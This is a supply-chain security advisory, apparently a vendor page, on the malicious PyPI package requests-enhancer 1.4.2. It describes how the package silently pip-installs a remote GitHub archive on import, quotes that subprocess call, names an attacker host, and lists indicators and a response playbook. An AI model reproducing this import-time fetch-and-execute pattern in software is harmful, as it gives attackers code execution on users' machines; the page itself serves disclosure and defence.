Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

requests-enhancerPyPI

Malicious code in requests-enhancer (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-6247
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall requests-enhancer

What this malware does

On import requests_enhancer, the package's __init__.py spawns a daemon thread that runs pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip via subprocess.run([sys.executable, '-m', 'pip', 'install',...]). The target is a mutable master-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo's setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer's machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare except Exception: pass, and the work is done on a daemon thread so the import returns immediately — making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.

Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-requests-enhancer

Reasons (based on the campaign):

  • backdoor

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • obfuscation

  • The malicious code is intentionally included in a dependency of the package

  • The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.

Malicious versions

1 flagged
1.4.2

Indicators of compromise (SHA-256)

950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62
a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for requests-enhancer (version 1.4.2). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging requests-enhancer across your stack and pipelines.

  2. If you installed it — respond

    requests-enhancer is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If requests-enhancer was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks requests-enhancer before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. requests-enhancer on PyPI has been identified as a malicious package (version 1.4.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-requests-enhancerIN-MAL-2026-007273

References

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

Detect & block this

O3 blocks requests-enhancer-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.